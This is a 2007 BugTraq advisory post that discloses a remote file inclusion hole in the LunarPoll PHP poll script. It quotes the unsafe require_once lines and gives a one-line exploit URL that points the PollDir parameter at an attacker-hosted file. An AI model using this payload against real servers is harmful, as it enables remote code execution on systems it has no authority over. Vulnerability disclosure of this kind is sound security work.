BugTraq
LunarPoll (PollDir) Remote File Include Vulnerabilities Jan 12 2007 11:54AM
ilkerKandemir mynet com
------------------------------------------------------------------------
-------------------------------------------

AYYILDIZ.ORG PreSents...

Script:LunarPoll
Script Download: dexxaboy.com/scripts/lunarpoll/download/

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once($PollDir.'/includes/functions.php');
require_once($PollDir.'/includes/IO.php');

------------------------------------------------------------------------
-------------------------------------------

Exploit: show.php?PollDir=http://attacker.txt?

------------------------------------------------------------------------
-------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
Special Tnx: AYYILDIZ.ORG

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus